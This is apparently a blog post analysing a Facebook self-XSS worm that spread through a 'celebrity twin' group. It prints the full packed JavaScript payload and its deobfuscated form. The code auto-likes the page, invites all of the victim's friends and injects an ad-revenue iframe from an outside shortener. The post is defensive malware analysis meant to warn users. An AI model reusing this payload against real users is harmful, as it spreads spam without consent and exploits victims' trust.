Facebook worm ahead

Few days ago i got a facebook notification about a friend of my suggesting that i "like" some group.

it was a group that finds your celebrity twin(in terms of appearance),i have heard about some technologies that can do that so i went to see what the group is about,i know that most of them are scam.

This group was not a exception,it asked you to click like in order to show its info page,after that it asked you to click a link,after clicking that link a modal window appeared. 

it first asks you which browser you are using(WTF?) then it makes you do a series of keyboard combinations(ctrl-C,alt-D,ctrl-V in firefox) that ends up in pasting a nasty JavaScript code into your url bar and then they ask you to press enter :)

of course i didn`t and i took that code and started to analyze it:

javascript:(function(){a='app134292463250339_jop';b='app134292463250339_jode';ifc='app134292463250339_ifc';ifo='app134292463250339_ifo';mw='app134292463250339_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();

As I have done my fair share of JavaScript coding,I quickly identified it as minified by dean edwards packer( function(p,a,c,k,e,r) is a easy way to see that).

so next thing was to de-minize it,that was done by running the inner function in firebug,what i got was this:

var _0x95ea=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];d=document;d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];s=d[_0x95ea[2]](_0x95ea[6]);m=d[_0x95ea[2]](_0x95ea[7]);c=d[_0x95ea[9]](_0x95ea[8]);c[_0x95ea[11]](_0x95ea[10],true,true);s[_0x95ea[12]](c);setTimeout(function(){fs[_0x95ea[13]]()},5000);setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);

so it seems there is another layer of obfuscation,the most intersting thing was the _0x95ea array that was hex encoded,so i just copy-paste it to a python shell,and the result was:

['visibility', 'style', 'getElementById', 'hidden', 'innerHTML', 'value', 'suggest', 'likeme', 'MouseEvents', 'createEvent', 'click', 'initEvent', 'dispatchEvent', 'select_all', 'sgm_invite_form', '/ajax/social_graph/invite_dialog.php', 'submitDialog']

ok so that seems to be a list of Javascript properties/methods and some other contants,we can see that the rest of the code is just refernecing the array,lets just replace the code with the values from the array:

d=document;
d['
getElementById'](mw)['style']['visibility']='hidden';
d[
'getElementById'](a)['innerHTML']=d['getElementById'](b)['value'];
s=d[
'getElementById']('suggest');
m=d[
'getElementById']('likeme');
c=d['
createEvent']('MouseEvents');
c['
initEvent']('click',true,true);
s['
dispatchEvent'](c);
setTimeout(function(){fs['
select_all']()},5000);
setTimeout(function(){SocialGraphManager['
submitDialog']('sgm_invite_form',''/ajax/social_graph/invite_dialog.php'')},5000);
setTimeout(function(){
      m['
dispatchEvent'](c);
      d['
getElementById'](ifo)['innerHTML']=d['getElementById'](ifc)['value']
},5000);

ok so at first look I thought that it was only opening the invite window,hiding it and sending a invitation to your friends(that is the way i got the invitation and that is the worm like behiavor).

but that was because I overlooked this line:

d['getElementById'](ifo)['innerHTML']=d['getElementById'](ifc)['value']

this line injects this html fragemnt into the page:

<iframe width="700" height="550" frameborder="0" scrolling="yes" src="http://xa.ly/Vx"></iframe>

which is a link to somekind of link shortner that gives you money for each impression,and also it redirects you to a page with ads,so the creator of this page makes some $$ for each sucker that clicks like!

the group currently have 17,000ish users,for 10 cent(a assumption) per impression,he made a nice 1740$ of thin air!

so thats it,it spread like a worm(altougth a bit manual) and makes the author some money.

the thing is that the technique can be used to do real evil stuff like stealing your facebook account(for example by sending your cookies to a remote server),most of tech savy people out there will not fall for this kind of crap,but 17,000 stupid users already did.

PS:the link to the group is http://www.facebook.com/pages/hds-mzw-t-htwm-slkm-bpyysbwq-wbd/128140680541003 it is in Hebrew,so the target audience is small,I wonder how much people a english group can attract :)

PS2:I reported this group but that doesn`t seems to shut down this page,I hope that this post will make facebook shutdown this kind of groups.